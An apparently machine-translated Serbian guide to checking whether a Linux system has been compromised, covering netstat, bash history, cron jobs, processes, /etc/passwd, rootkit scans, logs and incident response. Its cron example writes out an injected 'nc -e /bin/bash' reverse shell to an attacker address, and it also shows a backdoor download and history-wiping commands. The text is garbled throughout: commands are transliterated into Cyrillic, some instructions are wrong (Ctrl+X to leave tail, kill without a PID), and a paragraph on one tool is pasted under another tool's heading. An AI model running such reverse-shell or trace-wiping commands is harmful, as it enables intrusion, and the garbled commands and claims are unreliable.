Како утврдити да ли је Линук систем угрожен

Постоји много разлога због којих би се хакер увукао у ваш систем и стварао вам озбиљне проблеме. Пре неколико година, можда је било потребно показати своје вештине, али у данашње време намере које стоје иза таквих активности могу бити много сложеније са много ширијим последицама по жртву. Ово може звучати очигледно, али само зато што „све изгледа у реду“, то не значи да је све у реду. Хакери би могли продрети у ваш систем не обавестивши вас и заразити га малвером да би преузео потпуну контролу, па чак и за бочно кретање међу системима. Злонамерни софтвер се може сакрити у систему и служи као бацкдоор или систем за команду и контролу за хакере да извршавају злонамерне активности на вашем систему.Боље је бити на сигурном него жалити. Можда нећете одмах схватити да је ваш систем хакован, али постоје неки начини на које можете утврдити да ли је ваш систем угрожен. Овај чланак ће размотрити како утврдити да ли је ваш Линук Неовлашћена особа је угрозила систем или се бот пријављује у ваш систем ради злонамерних активности.

Нетстат

Нетстат је важан услужни програм за ТЦП / ИП мрежне командне линије који пружа информације и статистику о протоколима у употреби и активним мрежним везама.

Користићемо нетстат на примеру машине за жртве да би проверили да ли постоји нешто сумњиво у активним мрежним везама путем следеће команде:

[заштићена е-поштом]: ~ $ нетстат -антп

Овде ћемо видети све тренутно активне везе. Сада ћемо потражити а веза која не би требало да постоји.

Ево га, активна веза на ПОРТ-у 44999 (лука која не би требало да буде отворена).Можемо видети и друге детаље о вези, као што је ПИД, и име програма који се изводи у последњој колони. У овом случају, ПИД је 1555 а злонамерни терет који ради је ./шкољка.елф датотека.

Друга наредба за проверу портова који тренутно слушају и који су активни на вашем систему је следећа:

[заштићена е-поштом]: ~ $ нетстат -ла

Ово је прилично неуредан резултат. Да бисмо филтрирали слушање и успостављене везе, користићемо следећу команду:

[заштићена е-поштом]: ~ $ нетстат -ла | греп „СЛУШАЈ“ „УСТАНОВЉЕНО“

Ово ће вам дати само оне резултате који су вам важни, тако да можете лакше да их сортирате. Можемо видети активну везу на лука 44999 у наведеним резултатима.

Након препознавања злонамерног процеса, можете га убити следећим наредбама. Приметићемо ПИД процеса помоћу наредбе нетстат и убијте процес помоћу следеће наредбе:

[заштићена е-поштом]: ~ $ килл 1555

~.басх-историја

Линук води евиденцију о томе који су се корисници пријавили у систем, са које ИП адресе, када и колико дуго.

Овим информацијама можете приступити помоћу последњи команда. Излаз ове наредбе би изгледао овако:

[емаил заштићен]: ~ $ последњи

Излаз приказује корисничко име у првој колони, терминал у другој, изворну адресу у трећој, време пријаве у четвртој колони и укупно време сесије забележено у последњој колони. У овом случају корисници усман и убунту су и даље пријављени. Ако видите било коју сесију која није ауторизована или изгледа злонамерно, погледајте последњи одељак овог чланка.

Историја евидентирања се чува у ~.басх-историја датотека. Дакле, историја се може лако уклонити брисањем датотеке .басх-историја датотека. Ову акцију често изводе нападачи како би прикрили трагове.

[заштићена е-поштом]: ~ $ мачка .басх_хистори

Ова наредба ће приказати команде покренуте на вашем систему, а најновија команда изведена на дну листе.

Историја се може обрисати помоћу следеће наредбе:

[заштићен е-поштом]: ~ $ хистори -ц

Ова наредба ће избрисати историју само са терминала који тренутно користите. Дакле, постоји исправнији начин за то:

[заштићен е-поштом]: ~ $ цат / дев / нулл> ~ /.басх_хистори

Ово ће очистити садржај историје, али ће датотеку задржати на месту. Дакле, ако након покретања датотеке видите само своје тренутне податке за пријављивање последњи команда, ово уопште није добар знак. То указује на то да је ваш систем можда угрожен и да је нападач вероватно избрисао историју.

Ако сумњате на злонамерног корисника или ИП, пријавите се као тај корисник и покрените команду историја, као што следи:

[заштићена е-поштом]: ~ $ су
[емаил заштићен]: ~ $ историја

Ова наредба ће приказати историју наредби читањем датотеке .басх-историја у /кућа директоријум тог корисника. Пажљиво потражите вгет, увити се, или нетцат наредбе, у случају да их је нападач користио за пренос датотека или за инсталирање ван репо алата, као што су крипто-рудари или нежељени ботови.

Погледајте пример испод:

Изнад можете видети команду „вгет хттпс: // гитхуб.цом / сајитх / мод-роотме.” У овој наредби, хакер је покушао да приступи ван репо датотеке користећи вгет да преузмете бацкдоор под називом „мод-роот ме“ и инсталирате га на свој систем. Ова наредба у историји значи да је систем угрожен и да је нападач имао бацкдооред.

Запамтите, ова датотека се може лако избацити или произвести њена супстанца. Подаци дате овом наредбом не смеју се узимати као дефинитивна стварност. Ипак, у случају да је нападач извршио „лошу“ команду и занемарио евакуацију историје, он ће бити тамо.

Црон Јобс

Црон послови могу послужити као витални алат када су конфигурисани за постављање обрнуте љуске на нападачкој машини. Уређивање црон послова је важна вештина, па тако и знати како их прегледати.

Да бисмо погледали црон послове који се изводе за тренутног корисника, користићемо следећу наредбу:

[заштићен е-поштом]: ~ $ цронтаб -л

Да бисмо погледали црон послове који се изводе за другог корисника (у овом случају, Убунту), користићемо следећу команду:

[заштићена е-поштом]: ~ $ цронтаб -у убунту -л

За преглед дневних, сатних, недељних и месечних црон послова користићемо следеће команде:

Даили Црон послови:

[заштићен е-поштом]: ~ $ лс -ла / етц / црон.свакодневно

Посао по сатима:

[заштићен е-поштом]: ~ $ лс -ла / етц / црон.По сату

Недељни Црон послови:

[емаил заштићен]: ~ $ лс -ла / етц / црон.недељно

Узми пример:

Нападач може да стави црон посао / етц / цронтаб која покреће злонамерну команду 10 минута после сваког сата. Нападач такође може покренути злонамерну услугу или обрнуту позадинску љуску преко нетцат или неке друге корисности. Када извршите наредбу $ ~ цронтаб -л, видећете да се црон посао изводи под:

[заштићен е-поштом]: ~ $ цронтаб -л
ЦТ = $ (цронтаб -л)
ЦТ = $ ЦТ $ '\ н10 * * * * нц -е / бин / басх 192.168.8.131 44999 '
принтф "$ ЦТ" | цронтаб -
пс аук

Да бисте правилно прегледали да ли је ваш систем угрожен, такође је важно прегледати покренуте процесе. Постоје случајеви када неки неовлашћени процеси не троше довољно ЦПУ-а да би били наведени у врх команда. Ту ћемо користити пс наредба за приказ свих тренутно покренутих процеса.

[емаил заштићен]: ~ $ пс аукф

Прва колона приказује корисника, друга колона приказује јединствени ИД процеса, а коришћење ЦПУ-а и меморије је приказано у следећим колонама.

Ова табела ће вам пружити највише информација. Требали бисте прегледати сваки покренут поступак како бисте тражили било шта необично да бисте знали да ли је систем угрожен или не. У случају да пронађете нешто сумњиво, прогуглајте или покрените са такође команда, као што је горе приказано. Ово је добра навика за трчање пс команде на вашем серверу и то ће повећати ваше шансе да пронађете било шта сумњиво или ван ваше свакодневне рутине.

/ етц / пассвд

Тхе / етц / пассвд датотека прати сваког корисника у систему. Ово је датотека одвојена двотачком која садржи информације попут корисничког имена, корисничког имена, шифроване лозинке, ГроупИД (ГИД), пуног имена корисника, корисничког кућног директоријума и љуске за пријаву.

Ако нападач упадне у ваш систем, постоји могућност да ће створити још корисника, да ствари одвоје или да направи бацкдоор у вашем систему како би се вратио користећи тај бацкдоор. Док проверавате да ли је ваш систем угрожен, требало би да верификујете сваког корисника у датотеци / етц / пассвд. Унесите следећу наредбу да бисте то урадили:

[заштићен е-поштом]: ~ $ цат етц / пассвд

Ова наредба ће вам дати излаз сличан ономе у наставку:

гноме-Инитиал-Сетуп: к: 120: 65534 :: / рун / гноме-Инитиал-сетуп /: / бин / фалсе
гдм: к: 121: 125: Гноме Дисплаи Манагер: / вар / либ / гдм3: / бин / фалсе
усман: к: 1000: 1000: усман: / хоме / усман: / бин / басх
постгрес: к: 122: 128: ПостгреСКЛ администратор ,,,: / вар / либ / постгрескл: / бин / басх
дебиан-тор: к: 123: 129 :: / вар / либ / тор: / бин / фалсе
убунту: к: 1001: 1001: убунту ,,,: / хоме / убунту: / бин / басх
лигхтдм: к: 125: 132: Менаџер светлих екрана: / вар / либ / лигхтдм: / бин / фалсе
Дебиан-гдм: к: 124: 131: Гноме Дисплаи Манагер: / вар / либ / гдм3: / бин / фалсе
анонимно: к: 1002: 1002: ,,,: / хоме / анонимно: / бин / басх

Сада ћете желети да потражите било ког корисника којег нисте упознати. У овом примеру можете видети корисника у датотеци названој „анониман.”Још једна важна ствар коју треба имати на уму је да ако је нападач створио корисника за поновно пријављивање, кориснику ће такође бити додељена љуска„ / бин / басх ”. Дакле, можете сузити претрагу грепирањем следећег резултата:

[заштићен е-поштом]: ~ $ цат / етц / пассвд | греп -и "/ бин / басх"
усман: к: 1000: 1000: усман: / хоме / усман: / бин / басх
постгрес: к: 122: 128: ПостгреСКЛ администратор ,,,: / вар / либ / постгрескл: / бин / басх
убунту: к: 1001: 1001: убунту ,,,: / хоме / убунту: / бин / басх
анонимно: к: 1002: 1002: ,,,: / хоме / анонимно: / бин / басх

Можете да изведете још неке „басх магије“ да бисте прочистили свој излаз.

[заштићен е-поштом]: ~ $ цат / етц / пассвд | греп -и "/ бин / басх" | цут -д ":" -ф 1
усман
постгрес
убунту
анониман

Пронађи

Претраге засноване на времену корисне су за брзу тријажу. Корисник такође може изменити временске ознаке које мењају датотеке. Да бисте побољшали поузданост, укључите цтиме у критеријуме, јер је много теже петљати у њега јер захтевају модификације неких датотека нивоа.

Следећу наредбу можете користити за проналажење датотека креираних и измењених у последњих 5 дана:

[заштићен е-поштом]: ~ $ финд / -мтиме -о -цтиме -5

Да бисмо пронашли све СУИД датотеке у власништву роот-а и проверили да ли постоје неочекивани уноси на листама, користићемо следећу команду:

[заштићена е-поштом]: ~ $ финд / -перм -4000 -корисник роот -тип ф

Да бисмо пронашли све датотеке СГИД (сет усер ИД) у власништву роот-а и проверили да ли постоје неочекивани уноси на листама, користићемо следећу команду:

[заштићена е-поштом]: ~ $ финд / -перм -6000 -типе ф

Цхкрооткит

Рооткитс су једна од најгорих ствари које се могу догодити систему и један су од најопаснијих напада, опаснији од малвера и вируса, како због штете коју наносе систему, тако и због потешкоћа у њиховом проналажењу и откривању.

Дизајнирани су тако да остану скривени и раде злонамерне ствари попут крађе кредитних картица и података о банкарству на мрежи. Рооткитс дајте сајбер криминалцима могућност управљања рачунарским системом. Коренски програми такође помажу нападачу да надгледа ваше притиске тастера и онемогућава ваш антивирусни софтвер, што још више олакшава крађу ваших приватних података.

Ове врсте малвера могу дуго да остану на вашем систему, а да их корисник и не примети, и могу да изазову озбиљну штету. Када се Рооткит је откривен, не постоји други начин осим поновне инсталације целог система. Понекад ови напади могу чак да изазову отказ хардвера.

Срећом, постоје неки алати који могу помоћи у откривању Рооткитс на Линук системима, као што су Линис, Цлам АВ или ЛМД (Линук Малваре Детецт). Можете да проверите да ли је ваш систем познат Рооткитс користећи наредбе испод.

Прво инсталирајте Цхкрооткит путем следеће наредбе:

[заштићен е-поштом]: ~ $ судо апт инсталл цхкрооткит

Ово ће инсталирати Цхкрооткит оруђе. Помоћу ове алатке можете да проверите да ли има рооткитова помоћу следеће наредбе:

[емаил заштићен]: ~ $ судо цхкрооткит

Пакет Цхкрооткит састоји се од скрипте љуске која проверава системске бинарне датотеке на модификацију рооткита, као и неколико програма који проверавају различите сигурносне проблеме. У горе наведеном случају, пакет је проверио да ли постоји знак Рооткит-а на систему и није пронашао ниједан. Па, то је добар знак!

Линук евиденције

Линук дневници дају распоред догађаја у Линук радном оквиру и апликацијама и важан су инструмент испитивања када имате проблема. Примарни задатак који администратор треба да изврши када сазна да је систем угрожен требало би да сецира све записе дневника.

За експлицитна издања апликација радног подручја евиденција дневника се одржава у контакту са разним областима. На пример, Цхроме саставља извештаје о падовима '~ /.хром / извештаји о падовима '), где апликација за радно подручје саставља записнике који се ослањају на инжењера и показује да ли апликација узима у обзир прилагођени распоред дневника. Записи се налазе у/ вар / лог именик. Постоје Линук евиденције за све: фрамеворк, парт, снопове поглавља, обрасце за покретање, Ксорг, Апацхе и МиСКЛ. У овом чланку, тема ће се изричито концентрисати на евиденције Линук оквира.

У овај каталог можете да пређете користећи редослед компакт дискова. Требали бисте имати роот дозволе за преглед или промену датотека дневника.

[емаил заштићен]: ~ $ цд / вар / лог

Упутства за преглед Линук дневника

Користите следеће наредбе да бисте видели потребне документе дневника.

Линук команде се могу видети помоћу наредбе цд / вар / лог, у том тренутку састављањем наредбе да се виде трупци одложени испод овог каталога. Један од најзначајнијих дневника је сислог, који евидентира многе важне дневнике.

убунту @ убунту: мачка сислог

За санирање резултата користићемо „мање ” команда.

убунту @ убунту: мачка сислог | мање

Откуцајте наредбу вар / лог / сислог да видите подоста ствари испод сислог датотеку. Фокусирање на одређено питање потрајаће неко време, јер ће овај запис обично бити дуг. Притисните Схифт + Г да бисте се у запису померили до краја, означено са „ЕНД.”

Евиденције можете такође видети помоћу дмесг-а, који штампа носач прстена дела. Ова функција штампа све и шаље вас што даље уз документ. Од тог тренутка можете искористити наруџбину дмесг | мање да гледа кроз принос. У случају да вам је потребан преглед дневника за датог корисника, мораћете да покренете следећу команду:

дмесг - објект = корисник

У закључку можете да користите редослед репа да бисте видели документе дневника. То је мален, али користан услужни програм који се може користити, јер се користи за приказ последњег дела дневника, где се највероватније појавио проблем. Такође можете одредити број последњих бајтова или линија које ће се приказати у наредби таил. За ово користите наредбу таил / вар / лог / сислог. Постоји много начина за прегледање дневника.

За одређени број линија (модел узима у обзир последњих 5 редова) унесите следећу наредбу:

[заштићен е-поштом]: ~ $ таил -ф -н 5 / вар / лог / сислог

Ово ће одштампати последњих 5 редова. Када дође друга линија, бивша ће бити евакуисана. Да бисте побегли од редоследа репа, притисните Цтрл + Кс.

Важни Линук дневници

Примарна четири Линук дневника укључују:

Евиденције апликација
Евиденције догађаја
Дневници услуга
Системски дневници

убунту @ убунту: мачка сислог | мање

/ вар / лог / сислог или / вар / лог / мессагес: опште поруке, баш као подаци који се односе на оквир. Овај дневник чува све информације о акцијама у светском оквиру.

убунту @ убунту: мачка аут.лог | мање

/ вар / лог / аутх.Пријава или / вар / лог / сецуре: чувајте евиденције верификације, укључујући ефикасне и неуспешне пријаве и стратегије валидације. Дебиан и Убунту користе / вар / лог / аутх.Пријава за чување покушаја пријаве, док Редхат и ЦентОС користе / вар / лог / сецуре за чување евиденција аутентификације.

убунту @ убунту: мачка чизма.лог | мање

/ вар / лог / боот.Пријава: садржи информације о покретању и порукама током покретања.

убунту @ убунту: мачка маиллог | мање

/ вар / лог / маиллог или / вар / лог / маил.Пријава: чува све евиденције идентификоване са серверима поште; драгоцено када су вам потребни подаци о постфик-у, смтпд-у или било којој администрацији везаној за е-пошту која се изводи на вашем серверу.

убунту @ убунту: мачка керн | мање

/ вар / лог / керн: садржи информације о евиденцијама језгра. Овај дневник је важан за испитивање прилагођених делова.

убунту @ убунту: мачка дмесг | мање

/ вар / лог / дмесг: садржи поруке које идентификују управљачке програме гаџета. Наруџба дмесг се може користити за приказ порука у овом запису.

убунту @ убунту: мачка неуспех | мање

/ вар / лог / фаиллог: садржи податке о свим неуспелим покушајима пријаве, драгоценим за прикупљање делића знања о покушајима безбедносног продирања; на пример, они који желе да хакују сертификате за пријаву, баш као и напади животињске силе.

убунту @ убунту: мачка црон | мање

/ вар / лог / црон: чува све поруке повезане са Црон-ом; црон запошљавања, на пример, или када је црон демон започео позив, сродне поруке разочарања итд.

убунту @ убунту: мачка њам.лог | мање

/ вар / лог / иум.Пријава: у случају да уведете снопове користећи иум поредак, овај дневник чува све повезане податке, што може бити корисно при одлуци да ли су сноп и сви сегменти ефикасно уведени.

убунту @ убунту: мачка хттпд | мање

/ вар / лог / хттпд / или / вар / лог / апацхе2: ова два директоријума се користе за чување свих врста евиденција за Апацхе ХТТП сервер, укључујући евиденције приступа и евиденције грешака. Датотека еррор_лог садржи све лоше захтеве које је примио хттп сервер. Те грешке укључују проблеме са меморијом и друге грешке повезане са оквиром. Приступни дневник садржи евиденцију свих захтева примљених путем ХТТП-а.

убунту @ убунту: мачка мисклд.лог | мање

/ вар / лог / мисклд.Пријава или/ вар / лог / мискл.Пријава : МиСКЛ дневник документ који бележи све поруке о неуспеху, отклањању грешака и успеху. Ово је још једна појава када се оквир усмерава на регистар; РедХат, ЦентОС, Федора и други оквири засновани на РедХат-у користе / вар / лог / мисклд.лог, док Дебиан / Убунту користи / вар / лог / мискл.каталог дневника.

Алати за преглед Линук дневника

Данас је доступно мноштво програма за праћење евиденција отвореног кода и уређаја за испитивање, што чини одабир исправних средстава за евиденције акција једноставнијим него што бисте могли сумњати. Бесплатни програм за проверу дневника са отвореним кодом може да ради на било ком систему да би посао обавио. Ево пет најбољих које сам користио у прошлости, без одређеног редоследа.

ГРЕИЛОГ

Покренут у Немачкој 2011. године, Граилог се тренутно нуди или као уређај отвореног кода или као пословни аранжман. Граилог је замишљен као окупљени оквир за пријављивање на плочи који прима токове информација са различитих сервера или крајњих тачака и омогућава вам брзу анализу или рашчлањивање тих података.

Граилог је постигао позитивну репутацију међу главама оквира као резултат његове једноставности и свестраности. Већина веб подухвата започиње мало, а може се експоненцијално развијати. Граилог може прилагодити стекове преко система позадинских сервера и свакодневно обрађивати неколико терабајта података дневника.

Председавајући ИТ-а видеће предњи крај ГраиЛог интерфејса као једноставан за употребу и енергичан у својој корисности. Граилог заобилази идеју контролних табли, што омогућава корисницима да одаберу врсту мерења или изворе информација које сматрају важним и брзо посматрају нагибе након неког времена.

Када се догоди безбедносна епизода или епизода извршења, председавајући ИТ-а морају имати могућност да прате манифестације основном возачу што је брже могуће како би се разумно могло очекивати. Граилог-ова функција претраживања чини овај задатак једноставним. Овај алат је радио на адаптацији на унутрашњи неуспех који може покренути вишеструко напет подухват тако да можете заједно разбити неколико потенцијалних опасности.

НАГИОС

Основан од стране једног програмера 1999. године, Нагиос је од тада напредовао у један од најсигурнијих инструмената отвореног кода за надгледање података дневника. Садашња изведба Нагиоса може се применити на серверима који покрећу било коју врсту оперативног система (Линук, Виндовс, итд.).

Нагиос-ова основна ставка је сервер дневника, који поједностављује избор информација и чини податке прогресивно доступним извршним директорима. Мотор сервера дневника Нагиос хватаће информације постепено и уносити их у револуционарни инструмент претраживања. Укључивање у другу крајњу тачку или апликацију једноставна је помоћ овом инхерентном чаробњаку за аранжман.

Нагиос се често користи у удружењима која требају надгледати сигурност својих насеља и могу прегледати низ прилика повезаних са системом како би помогли у роботизацији преношења упозорења. Нагиос се може програмирати за извршавање одређених задатака када је испуњен одређени услов, што омогућава корисницима да открију проблеме чак и пре него што се укључе људске потребе.

Као главни аспект процене система, Нагиос ће каналисати информације дневника у зависности од географског подручја одакле започиње. Комплетне контролне табле са иновацијама у мапирању могу се применити да би се видело струјање веб промета.

ЛОГАЛИЗУЈ

Логализе производи алате отвореног кода за директоре оквира или системске администраторе и стручњаке за безбедност који им помажу у надгледању дневника сервера и омогућавају им да се усредсреде на претварање дневника у драгоцене информације. Основна ставка овог алата је та што је доступан као бесплатан за преузимање за кућну или пословну употребу.

Нагиос-ова основна ставка је сервер дневника, који поједностављује избор информација и чини податке прогресивно доступним извршним директорима. Мотор сервера дневника Нагиос хватаће информације постепено и уносити их у револуционарни инструмент претраживања. Укључивање у другу крајњу тачку или апликацију једноставна је помоћ за овај инхерентни чаробњак за аранжман.

Нагиос се често користи у удружењима која требају надгледати сигурност својих насеља и могу прегледати низ прилика повезаних са системом како би помогли у роботизацији преношења упозорења. Нагиос се може програмирати за обављање одређених задатака када је испуњен одређени услов, што омогућава корисницима да открију проблеме чак и пре него што се укључе људске потребе.

Шта треба учинити ако сте били угрожени?

Главна ствар је да не паничите, посебно ако је неовлашћена особа тренутно пријављена. Требали бисте имати могућност да преузмете контролу над машином пре него што друга особа сазна да знате за њу. У случају да знају да сте свесни њиховог присуства, нападач вас може спречити да се налази ван вашег сервера и почети уништавати ваш систем. Ако нисте толико технички, онда све што морате учинити је да одмах искључите цео сервер. Можете искључити сервер помоћу следећих команди:

[заштићен е-поштом]: ~ $ схутдовн -х нов

Или

[заштићена е-поштом]: ~ $ системцтл поверофф

Други начин да то урадите је пријава на контролну таблу вашег добављача услуга хостинга и његово искључивање одатле. Када се сервер искључи, можете радити на потребним правилима заштитног зида и консултовати се са било ким за помоћ у своје време.

У случају да се осећате сигурније и да ваш добављач услуга хостинга има заштитни зид узводно, направите и омогућите следећа два правила:

Омогућите ССХ саобраћај само са ваше ИП адресе.
Блокирајте све остало, не само ССХ, већ и сваки протокол покренут на сваком порту.

Да бисте проверили да ли постоје активне ССХ сесије, користите следећу команду:

[заштићен е-поштом]: ~ $ сс | греп ссх

Користите следећу наредбу да убијете њихову ССХ сесију:

[заштићен е-поштом]: ~ $ килл

Ово ће убити њихову ССХ сесију и омогућити вам приступ серверу. У случају да немате приступ узводном заштитном зиду, тада ћете морати створити и омогућити правила заштитног зида на самом серверу. Затим, када се поставе правила заштитног зида, убијте ССХ сесију неовлашћеног корисника помоћу наредбе „убити“.

Последња техника, тамо где је доступна, пријавите се на сервер помоћу везе изван опсега, као што је серијска конзола. Зауставите свако умрежавање помоћу следеће команде:

[заштићена е-поштом]: ~ $ системцтл заустави мрежу.услуга

Ово ће у потпуности зауставити сваки систем који долази до вас, тако да ћете сада моћи да омогућите контроле заштитног зида у своје време.

Једном када повратите контролу над сервером, немојте му лако веровати. Не покушавајте да поправите ствари и поново их користите. Оно што је покварено не може се поправити. Никада не бисте сазнали шта нападач може да учини, и зато никада не бисте требали бити сигурни да је сервер сигуран. Дакле, поновно инсталирање требало би да буде ваш последњи корак.